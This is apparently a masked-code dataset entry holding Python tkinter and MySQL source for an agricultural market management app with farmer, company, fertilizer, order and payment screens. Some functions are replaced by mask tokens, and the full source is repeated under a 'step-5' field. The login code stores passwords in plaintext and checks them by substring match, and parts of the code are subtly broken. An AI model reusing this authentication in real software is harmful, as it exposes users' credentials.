bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)\n Button.place(x=300, y=400)\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql = 'DELETE FROM payment WHERE trans_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n payment()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-5": "#! /usr/bin/python3\nimport pprint\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom PIL import Image\nfrom tkinter import *\nfrom prettytable import PrettyTable\nimport ttk\nimport os\nimport subprocess\nimport mysql.connector\nfrom datetime import datetime\nimport time\n\n\ndb=mysql.connector.connect(host='localhost',user='root',passwd='PASSWORD',database='DATABASENAME')\ncur=db.cursor()\n\n\nroot=Tk()\nroot.title(\"WELCOME TO AGRI MARKET\")\n\n#stored procedure\n\"\"\"\n DELIMITER $$\n \n CREATE PROCEDURE getMonth(\n IN month VARCHAR(2))\n BEGIN\n SELECT * FROM payment\n WHERE p_date LIKE CONCAT('____-',month,'%');\n END$$\n\n DELIMITER ;\n\n\"\"\"\n\nT1,T2,T3=0,0,0\ndef First_page(root):\n global T1,T2,T3\n frame=Frame(root,height=500,width=800,bg='ivory')\n frame.pack()\n\n label=Label(root,text='WELCOME TO AGRI MARKET',font=('Times new roman',25))\n label.place(x=200,y=50)\n\n button=Button(root,text='LogIn',font=('times new roman',20),command=check_pass,bg='green')\n button.place(x=350,y=350)\n\n L1 = tk.Label(root, text=\"Username\", font=(\"Arial Bold\", 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width = 30, bd = 5)\n T1.place(x=280, y=200)\n\n L2 = tk.Label(root, text=\"Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width = 30, show='*', bd = 5)\n T2.place(x=280, y=250)\n\n reg_button=Button(root,text='Register',font=(\"Arial Bold\",15),bg='blue',command=create_pass)\n reg_button.place(x=340,y=400)\n\ndef check_pass():\n global root,T1,T2,T3\n try:\n with open('password.txt','r')as f:\n lines=f.read()\n if T1.get()+'='+T2.get() in lines and T1.get()!='' and T2.get()!='':\n entity_page()\n else:\n label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))\n label.place(x=200,y=100)\n except:\n label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))\n label.place(x=200,y=100)\n\ndef create_pass():\n global root,T1,T2,T3\n\n\n #to clean up previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')\n label.place(x=0,y=0)\n\n\n #this window\n L1 = tk.Label(root, text=\"Username\", font=(\"Arial Bold\", 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width = 30, bd = 5)\n T1.place(x=380, y=200)\n\n L2 = tk.Label(root, text=\"Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width = 30, show='*', bd = 5)\n T2.place(x=380, y=250)\n\n L2 = tk.Label(root, text=\"Confirm Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width = 30, show='*', bd = 5)\n T3.place(x=380, y=300)\n\n reg_button=Button(root,text='Done',font=(\"Arial Bold\",15),bg='blue',command=add_pass)\n reg_button.place(x=440,y=400)\n\n\ndef add_pass():\n global root,T1,T2,T3\n\n if T2.get()!=T3.get():\n label=Label(root,text='Incorrect Password. Enter again',font=('times new roman',20))\n label.place(x=100,y=100)\n else:\n try:\n with open('password.txt','r')as f:\n data=f.read()\n with open('password.txt','w')as f:\n f.write(data+'\\n')\n f.write(T1.get()+'='+T2.get())\n\n entity_page()\n except:\n with open('password.txt','w')as f:\n f.write(T1.get()+'='+T2.get())\n\n entity_page()\n\ndef entity_page():\n global root\n #cleaning previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')\n label.place(x=0,y=0)\n\n #this window\n label=Label(root,text='WELCOME TO AGRI MARKET ',font=('Times new roman',20),bg='blue')\n label.place(x=200,y=20)\n\n label=Label(root,text='Choose the Entity ',font=('Times new roman',20),bg='white')\n label.place(x=250,y=100)\n\n\n Button = tk.Button(root, text=\"Farmers\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=100, y=150+25)\n\n Button = tk.Button(root, text=\"Company\", font=(\"Arial\", 15),command=company)\n Button.place(x=300, y=150+25)\n\n Button = tk.Button(root, text=\"Fertilizer\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=500, y=150+25)\n\n Button = tk.Button(root, text=\"Order\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=300+25)\n\n Button = tk.Button(root, text=\"Payment\", font=(\"Arial\", 15),command=payment)\n Button.place(x=400, y=300+25)\n\n Button = tk.Button(root, text=\"GET BOOKING HISTORY\", 